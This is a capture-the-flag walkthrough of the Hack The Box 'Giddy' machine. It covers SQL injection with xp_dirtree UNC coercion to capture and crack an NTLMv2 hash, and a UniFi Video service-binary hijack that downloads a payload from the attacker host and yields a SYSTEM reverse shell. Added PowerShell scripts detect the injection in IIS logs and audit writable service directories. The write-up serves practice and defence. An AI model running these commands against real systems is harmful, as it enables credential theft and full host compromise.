
Today we are going to solve another CTF challenge, “Giddy”. It is a retired vulnerable lab presented by Hack The Box to help pentesters practise online penetration testing according to their experience level; they have a collection of vulnerable labs as challenges, from beginner to expert level.

Level: Expert

Task: To find user.txt and root.txt file

Note: Since these labs are available online, they have static IPs. The IP of Giddy is 10.10.10.104.

As always, we will start with nmap to scan for open ports and services:

root@kali:~/htb/giddy# nmap -sV -sT -sC 10.10.10.104
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-27 12:24 CET
Nmap scan report for 10.10.10.104
Host is up (0.029s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods: 
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
443/tcp open ssl/http Microsoft IIS httpd 10.0
| http-methods: 
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| ssl-cert: Subject: commonName=PowerShellWebAccessTestWebSite
| Not valid before: 2018-06-16T21:28:55
|_Not valid after: 2018-09-14T21:28:55
|_ssl-date: 2019-02-27T11:25:03+00:00; 0s from scanner time.
| tls-alpn: 
| h2
|_ http/1.1
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=Giddy
| Not valid before: 2019-02-23T22:16:52
|_Not valid after: 2019-08-25T22:16:52
|_ssl-date: 2019-02-27T11:25:03+00:00; 0s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.30 seconds

On http (port 80) there is only this picture:

The same picture is served on https (port 443).

Let’s run wfuzz against the web root:

c:\PENTEST>wfuzz -c -z file,directory-list-2.3-medium.txt --hc=404 http://10.10.10.104/FUZZ
********************************************************
* Wfuzz 2.3.4 - The Web Fuzzer *
********************************************************

Target: http://10.10.10.104/FUZZ
Total requests: 220551

==================================================================
ID Response Lines Word Chars Payload
==================================================================

000002: C=200 31 L 55 W 700 Ch "#"
000001: C=200 31 L 55 W 700 Ch "# directory-list-2.3-medium.txt"
000003: C=200 31 L 55 W 700 Ch "# Copyright 2007 James Fisher"
000004: C=200 31 L 55 W 700 Ch "#"
000005: C=200 31 L 55 W 700 Ch ""
002307: C=302 3 L 8 W 157 Ch "remote"
006995: C=400 80 L 276 W 3420 Ch "*checkout*"
015454: C=400 80 L 276 W 3420 Ch "*docroot*"
015778: C=301 1 L 10 W 147 Ch "mvc"
016404: C=400 80 L 276 W 3420 Ch "*"
022962: C=400 80 L 276 W 3420 Ch "http%3A%2F%2Fwww"
031858: C=400 80 L 276 W 3420 Ch "http%3A"
035269: C=400 80 L 276 W 3420 Ch "q%26a"
035650: C=400 80 L 276 W 3420 Ch "**http%3a"
039198: C=400 80 L 276 W 3420 Ch "*http%3A"
045231: C=200 31 L 55 W 700 Ch ""
055398: C=400 80 L 276 W 3420 Ch "**http%3A"
055688: C=400 80 L 276 W 3420 Ch "http%3A%2F%2Fyoutube"
063474: C=404 29 L 95 W 1245 Ch "rss_promo"
Finishing pending requests...

Let’s take a look at /remote:

It redirects us to a page titled Windows PowerShell Web Access. We don’t have any credentials yet, so we can ignore this for now and check /mvc.

There we get this ASP.NET application:


SQLi and getting user

After some regular enumeration, we find that when we click on a product name we get something like this:

The URL has a parameter called ProductSubCategoryId, and if we try a single quote ':

We get an error saying “Unclosed quotation mark after the character string”, so this parameter is SQL injectable. Let’s try something like 1; UPDATE Product SET Name= ''

And we see that it dumped the products. Next we can run Responder and use xp_dirtree to make the server try to connect to us; you can read about xp_dirtree here.

To do this, let’s run Responder first: responder -I tun0

Then let’s use xp_dirtree: 1; EXEC MASTER.sys.xp_dirtree '\\10.10.xx.xx\fakeshare'

What this does is simple: Responder runs a fake SMB server that captures NTLM authentication, and by calling xp_dirtree with a UNC path we make the SQL Server try to connect to that fake share and authenticate to it. Let’s check Responder now:

root@kali:~/htb/giddy# responder -I tun0
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 2.3.3.9

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CRTL-C


[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    DNS/MDNS                   [ON]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Fingerprint hosts          [OFF]

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.10.14.20]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP']

[+] Listening for events...
[SMBv2] NTLMv2-SSP Client : 10.10.10.104
[SMBv2] NTLMv2-SSP Username : GIDDY\Stacy
[SMBv2] NTLMv2-SSP Hash : Stacy::GIDDY:72fe267ac292121b:6744A5C663ED890D026D026BECE2B31B:0101000000000000C0653150DE09D201C94925EC226E4117000000000200080053004D004200330001001E00570049004E002D00500052004800340039003200520051004100460056000400140053004D00420033002E006C006F00630061006C0003003400570049004E002D00500052004800340039003200520051004100460056002E0053004D00420033002E006C006F00630061006C000500140053004D00420033002E006C006F00630061006C0007000800C0653150DE09D201060004000200000008003000300000000000000000000000003000006685072246E39F2F27E3BF3B79A87F7D3EF09383F6DE7E145476F2934DBB8F430A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E0032003000000000000000000000000000
[*] Skipping previously captured hash for GIDDY\Stacy
[*] Skipping previously captured hash for GIDDY\Stacy
[*] Skipping previously captured hash for GIDDY\Stacy
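As an added example that is not part of the original write-up, the PowerShell below scans IIS W3C log lines for the injection pattern shown above: a stray quote, a stacked statement, or an xp_dirtree call with a UNC path inside the ProductSubCategoryId query string. The log lines and the /mvc/Product URI stem are constructed for the demo.

```powershell
# Added example, not from the original post. Sample IIS W3C log lines are
# constructed; the field list mirrors a trimmed default IIS "#Fields:" header.
$sampleLog = @'
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2019-02-27 11:40:01 GET /mvc/Product - 10.10.14.20 200
2019-02-27 11:40:09 GET /mvc/Product ProductSubCategoryId=18 10.10.14.20 200
2019-02-27 11:40:20 GET /mvc/Product ProductSubCategoryId=18%27 10.10.14.20 500
2019-02-27 11:41:02 GET /mvc/Product ProductSubCategoryId=1;+EXEC+MASTER.sys.xp_dirtree+%27%5C%5C10.10.14.20%5Cfakeshare%27 10.10.14.20 200
'@

# Each rule is a regex applied to the URL-decoded query string.
$rules = [ordered]@{
  'unbalanced quote'          = "'"
  'stacked statement'         = ';\s*(exec|update|insert|delete|drop)\b'
  'xp_dirtree / UNC coercion' = 'xp_(dirtree|fileexist|cmdshell)|\\\\[\w.-]+\\'
}

function Find-SqliCandidates([string[]]$lines) {
  $fields = @()
  foreach ($line in $lines) {
    # The "#Fields:" directive names the columns; other "#" lines are comments.
    if ($line -like '#Fields:*') { $fields = ($line -replace '^#Fields:\s*', '') -split '\s+'; continue }
    if ($line.StartsWith('#') -or -not $fields) { continue }
    $cols = $line -split '\s+'
    $row = @{}
    for ($i = 0; $i -lt $fields.Count; $i++) { $row[$fields[$i]] = $cols[$i] }
    if ($row['cs-uri-query'] -eq '-') { continue }
    # IIS stores the query string URL-encoded; '+' stands for a space.
    $query = [System.Uri]::UnescapeDataString($row['cs-uri-query'].Replace('+', ' '))
    $hits = $rules.Keys | Where-Object { $query -imatch $rules[$_] }
    if ($hits) {
      [PSCustomObject]@{
        Time    = $row['date'] + ' ' + $row['time']
        Client  = $row['c-ip']
        Status  = $row['sc-status']
        Reasons = ($hits -join ', ')
        Query   = $query
      }
    }
  }
}

Find-SqliCandidates ($sampleLog -split "`r?`n") | Format-List
```

On a real server, feed it Get-Content of the site log under the IIS log directory (C:\inetpub\logs\LogFiles by default); the root cause is removed by parameterising the ProductSubCategoryId query and revoking the web application's database login's EXECUTE right on xp_dirtree, while blocking outbound SMB from the server keeps the hash from leaving.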

We captured the NTLMv2 hash for a user called Stacy. Let’s crack the hash with john:

root@kali:~/htb/giddy# john --wordlist=/usr/share/wordlists/rockyou.txt stacy.hash
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Press 'q' or Ctrl-C to abort, almost any other key for status
xNnWo6272k7x (Stacy)
1g 0:00:00:08 DONE (2019-02-27 12:14) 0.1177g/s 316692p/s 316692c/s 316692C/s xNnWo6272k7x
Use the "--show" option to display all of the cracked passwords reliably
Session completed

And the password is xNnWo6272k7x. Let’s use it on the PowerShell Web Access.

We get this web interface for PowerShell:

We can get the user flag now:

PS C:\Users\Stacy\Documents> cd ../Desktop
PS C:\Users\Stacy\Desktop> type user.txt
10C*****0AD

UniFi Video local privilege escalation

If we return to Documents, we find a file called unifivideo.

UniFi Video is a powerful and flexible, integrated IP video management surveillance system designed to work with Ubiquiti’s UniFi Video Camera product line. UniFi Video has an intuitive, configurable, and feature‑packed user interface with advanced features such as motion detection, auto‑discovery, user-level security, storage management, reporting, and mobile device support.

A quick Google search shows that an old version of UniFi Video had a local privilege escalation vulnerability; check it here.

What happens is this: when the “Ubiquiti UniFi Video” service starts, it tries to execute a file called taskkill.exe from C:\ProgramData\unifi-video\, but that file doesn’t exist by default. If we have write permission on that directory, we can place our payload there as taskkill.exe and restart the service. Because the service runs with privileged permissions, the payload is executed as administrator.

PS C:\ProgramData\unifi-video> Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services | where Name -Match 'uni'

    Hive: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services

Name              Property
----              --------
UniFiVideoService Type            : 16
                  Start           : 2
                  ErrorControl    : 1
                  ImagePath       : C:\ProgramData\unifi-video\avService.exe //RS//UniFiVideoService
                  DisplayName     : Ubiquiti UniFi Video
                  DependOnService : {Tcpip, Afd}
                  ObjectName      : LocalSystem
                  Description     : Ubiquiti UniFi Video Service

PS C:\ProgramData\unifi-video> .\taskkill.exe
Program 'taskkill.exe' failed to run: This program is blocked by group policy. For more information, contact your system administrator.
    + CategoryInfo          : ResourceUnavailable: (:) [], ApplicationFailedException
    + FullyQualifiedErrorId : NativeCommandFailed
PS C:\ProgramData\unifi-video> Get-AppLockerPolicy -Local

Version RuleCollections
------- ---------------
      1 {Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.FilePublisherRule, Microsoft.Security.Applica...
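As an added example (not from the original post), this PowerShell audit looks for the weakness just described across the whole host: it walks every service's ImagePath, resolves the binary's directory and reports any directory where Everyone, Authenticated Users or BUILTIN\Users may create files, together with the account the service runs as. The function name and output columns are my own.

```powershell
# Added example, not from the original write-up: find services whose binary
# directory is writable by ordinary users, as C:\ProgramData\unifi-video is above.
function Get-WritableServiceDirs {
  # Every interactive user is a member of these principals.
  $lowPrivSids = 'S-1-1-0', 'S-1-5-11', 'S-1-5-32-545'   # Everyone, Authenticated Users, BUILTIN\Users
  # Rights that let a caller add or replace files in the directory.
  $writeMask = [int][System.Security.AccessControl.FileSystemRights]'CreateFiles, CreateDirectories, Delete, ChangePermissions, TakeOwnership'
  $genericMask = 0x10000000 -bor 0x40000000                 # GENERIC_ALL | GENERIC_WRITE on some inherited ACEs

  Get-ChildItem Registry::HKLM\SYSTEM\CurrentControlSet\Services | ForEach-Object {
    $svc = Get-ItemProperty $_.PSPath -ErrorAction SilentlyContinue
    $img = [string]$svc.ImagePath
    if (-not $img) { return }
    # ImagePath may be quoted and may carry arguments, e.g.
    #   C:\ProgramData\unifi-video\avService.exe //RS//UniFiVideoService
    if ($img.StartsWith('"'))          { $exe = $img.Split('"')[1] }
    elseif ($img -match '^(.+?\.exe)') { $exe = $Matches[1] }
    else                               { return }              # drivers etc.
    $dir = Split-Path ([Environment]::ExpandEnvironmentVariables($exe)) -Parent
    if (-not $dir -or -not (Test-Path -LiteralPath $dir)) { return }

    foreach ($ace in (Get-Acl -LiteralPath $dir).Access) {
      if ($ace.AccessControlType -ne 'Allow') { continue }
      try   { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value }
      catch { continue }                                       # orphaned SID, skip
      $rights = [int]$ace.FileSystemRights
      if (($lowPrivSids -contains $sid) -and
          ((($rights -band $writeMask) -ne 0) -or (($rights -band $genericMask) -ne 0))) {
        [PSCustomObject]@{
          Service   = $_.PSChildName
          RunsAs    = $svc.ObjectName
          Directory = $dir
          Principal = $ace.IdentityReference.Value
          Rights    = $ace.FileSystemRights
        }
      }
    }
  }
}

Get-WritableServiceDirs | Format-Table -AutoSize
```

Run it from an elevated prompt on the server; a service listed with RunsAs LocalSystem is exactly the condition this section relies on, and the fix is to restrict the directory ACL to administrators (or have the installer place the service under Program Files).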

Let’s first create a payload with C# (the source, taskkill.cs, is compiled with the .NET Framework compiler):

c:\PENTEST>c:\windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /t:exe /out:taskkill.exe taskkill.cs
Microsoft (R) Visual C# Compiler version 4.7.3056.0
for C# 5
Copyright (C) Microsoft Corporation. All rights reserved.

This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240

taskkill.cs(64,34): warning CS0168: The variable 'err' is declared but never used

Then we run a simple HTTP server with Python to host the payload:

c:\PENTEST>python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.104 - - [27/Feb/2019 17:45:50] "GET /taskkill.exe HTTP/1.1" 200 -

After that we download the file; since we are in PowerShell we can do this:

Invoke-WebRequest -o taskkill.exe http://10.10.xx.xx/taskkill.exe

Then we stop the service:

Stop-Service "Ubiquiti UniFi Video" 

And start it again:

Start-Service "Ubiquiti UniFi Video" 


When the service restarts, our netcat listener receives a connection:
c:\Users\jacco>nc -lvp 443
listening on [any] 443 ...
10.10.10.104: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [10.10.14.20] from (UNKNOWN) [10.10.10.104] 49782: NO_DATA
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\ProgramData\unifi-video>whoami
nt authority\system
C:\ProgramData\unifi-video>cd c:\Users\administrator\desktop
c:\Users\Administrator\Desktop>dir
Volume in drive C is Windows 2016
Volume Serial Number is 0828-8CAE
Directory of c:\Users\Administrator\Desktop
06/17/2018 09:53 AM <DIR> .
06/17/2018 09:53 AM <DIR> ..
06/17/2018 09:53 AM 32 root.txt
06/16/2018 08:54 PM 842 Ubiquiti UniFi Video.lnk
2 File(s) 874 bytes
2 Dir(s) 42,888,380,416 bytes free
c:\Users\Administrator\Desktop>type root.txt
CF5*****1B1